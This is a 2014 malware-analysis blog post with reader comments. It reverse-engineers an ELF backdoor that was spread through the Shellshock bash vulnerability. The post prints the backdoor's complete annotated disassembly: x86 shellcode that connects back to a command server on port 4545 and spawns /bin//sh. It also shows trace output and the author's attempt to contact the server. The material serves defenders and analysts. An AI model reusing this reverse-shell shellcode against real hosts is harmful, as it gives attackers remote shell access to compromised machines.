Friday, September 26, 2014

MMD-0027-2014 - Linux ELF bash 0day (shellshock): The fun has only just begun.. (Part 1)

Background: CVE-2014-6271 + CVE-2014-7169

During the mayhem of bash 0day remote execution vulnerability CVE-2014-6271 and CVE-2014-7169, not for bragging but as a FYI, I happened to be the first who reversed for the first ELF malware spotted used in the wild. The rough disassembly analysis and summary I wrote and posted in Virus Total & Kernel Mode here --> [-1-] [-2-] < thanks to Yinettesys (credit) (the credit is all for her for links to find this malware, for the swift sensoring & alert, and thanks for analysis request, we won't aware of these that fast w/o her).

The fun has only just begun...

Yes. Today I was informed there is another payload distributed, thank's to my good friend :

Which leads to this malicious ELF file served online:

Do the pure reversing..

This ELF "malware" is working differently, it connects to remote host with attempt to bind connection on the certain port while spawning the shell "/bin//sh" upon connected, yes, a remote shell backdoor. Coded with ASM & shellcode to Linux kernel's system call addresses.
For your conveniences, I wrote my decoding scratch & disassembly of all malware bits below in comments, for all of us to see how it works:

0x08048054    31db         xor ebx, ebx
0x08048056    f7e3         mul ebx
0x08048058    53           push ebx
0x08048059    43           inc ebx  // = "SYS_SOCKET" = "socket" ()
0x0804805a    53           push ebx  // Build arg array for INET { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF_INET = 2 }
0x0804805b    6a02         push 0x2  // 0x0002 = "PF_INET" 
0x0804805d    89e1         mov ecx, esp //  ecx = pointer to arg array
0x0804805f    b066         mov al, 0x66  // socketcall (syscall # 102) 
0x08048061    cd80         int 0x80  // call interrupt / exec
0x08048063    93           xchg ebx, eax
0x08048064    59           pop ecx
0x08048065    b03f         mov al, 0x3f // <=== system call: _connect()
0x08048067    cd80         int 0x80 // call interrupt _syscall
0x08048069    49           dec ecx
0x0804806a    79f9         jns 0x108048065 // loop to re connect..
0x0804806c    681b139fe0   push 0xe09f131b // 0xe09f131b addr "to IP"
0x08048071    68020011c1   push 0xc1110002 // 0xc1110002 addr "to ports#"
0x08048076    89e1         mov ecx, esp // server strct pointer
0x08048078    b066         mov al, 0x66 // socketcall (syscall # 102)
0x0804807a    50           push eax 
0x0804807b    51           push ecx //  value: "\002" // AF_INET = 2
0x0804807c    53           push ebx // ebx =2 = sys_bind / bind()
0x0804807d    b303         mov bl, 0x3 // system call: _connect()
0x0804807f    89e1         mov ecx, esp  //ecx = "arguement array" "\a"
0x08048081    cd80         int 0x80 // int 0x80 .. _syscall / call interrupt / exec
0x08048083    52           push edx ; push null string termination
0x08048084    682f2f7368   push 0x68732f2f  // push "//sh" to the stack
0x08048089    682f62696e   push 0x6e69622f  //push "/bin" to the stack
0x0804808e    89e3         mov ebx, esp // addr of "/bin//sh" into ebx via esp
0x08048090    52           push edx // push x32 null terminator to stack
0x08048091    53           push ebx // push string address to stack up from null terminator point
0x08048092    89e1         mov ecx, esp // arg array with string ptr
0x08048094    b00b         mov al, 0xb
0x08048096    cd80         int 0x80 // execve("/bin//sh", ["/bin//sh", NULL], [NULL])
↑this is all to find out it back-connects to ip in port 4545 & spawning shell "/bin//sh" of the infected host after connected to that remote host. I think I saw this as shellcode, was used in about a lot in 2011 or 2012..

Just in case you want to see how I reversed it: (guess.. what tool is it?? *smile)

Confirming reverse engineering:

dup2(3, 2)                              = 2
dup2(3, 1)                              = 1
dup2(3, 0)                              = 0
connect(3, {sa_family=AF_INET, sin_port=htons(4545), sin_addr=inet_addr("")
The dup stub burps as per coded strings. It is self-explanatory.

Reversing is confirmed, next step is... let's bang their door! :-))

fu4k   12467   mmd    0u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    1u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    2u     IPv4       243888042   0t0    TCP> (SYN_SENT)
fu4k   12467   mmd    3u     unix 0xffff88018aad94c0   0t0 243884464 socket
fu4k   12467   mmd    4u     unix 0xffff88018aad8e40   0t0 243884465 socket
fu4k   12467   mmd    5u     unix 0xffff88018aad8e40   0t0 243884465 socket
fu4k   12467   mmd    6r     FIFO          0,8   0t0 243884466 pipe
fu4k   12467   mmd    7w     FIFO          0,8   0t0 243884466 pipe
fu4k   12467   mmd    8u     IPv4       243888042   0t0    TCP> (SYN_SENT)
It looks like he doesn't want to play with my "knock knock" game.. :-(( #bummer

This is the CNC IP source:

IP: ""
ASN: "4134"
CIDR: ""
Contry: "CN"

Detection ratio

As always for a new ELF malware found.. AV detection is ZERO (FUD/FullyUnDetected):

Sample is (always) shared

I am sharing the sample in kernelmode, I register new ELF malware repository name: "Linux/binsh" < since it uses "/bin//sh" as shell in hard coded shellcode-->[LINK]


So we have "another" crook start playing with ELF hacks for spying purpose on shellshock too :-)

Thank you

Thank you to IT media article who directly mentioned and linked to us:

Thank you to the IT media article who mentioned our work:

Thank you for blog and commments links:

Stay safe..there will be more of these.. #MalwareMustDie!


  1. Some of you may think this is a mere reversed shell (shell_reverse_tcp) attack, produced automatically by msfpayload. The msfpayload shell_reverse_tcp shell code (I didn't analyze that) maybe the same in assembly as this, but that's NOT the issue here.
    This is the ELF binary "compiled" with that shellcode logic inside, infected via shellshock exploit to be saved and executed in /tmp of vulnerable host < backdoor malware to me as ELF malware specialist.

  2. I'm trying to disassemble this file, can you please tell which debugger will let me dump object file in linux. Not able to dump using objdump. In edb debugger, I can see the assembly code but can't dump.

    1. Could you be more specific my your statement of "Not able to dump using objdump"? objdump can, as long as you feed the right binary to right architecture installed with it.

  3. Hello, on my web server apache I have identified an attempt to DDOS, there are several packages from the httpd service to
    through port 6667. My knowledge of linux is little, and reading these articles, however I can not find a point on which to start the process of correction. Can you tell me the right steps? thank you.

    1. It seems like your web server was braached by the IRC perl Bot or IRC PHP Bot, they connect from IRC service to execute command to your breached linux shell to do malicious activity.

      Steps are:
      1. Check your files served in your web server, there must be things that is not supposed to be there, remove them.
      2. Upgrade your web server's packages, and your Linux/UNIX packages too with the latest version, it REALLY helps you preventing things like this happen again.
      3. If you find something unusual, please make sure down to the bottom of source that causing it, don't stop until you have explanation. Feel free to contact me in @malwaremustdie (twitter) for any questions, I maybe can help you with several problems.

  4. when u analysis this file, what kind of Tools did u used ?

    1. i use what unix software provided me to use. nothing more or fancy.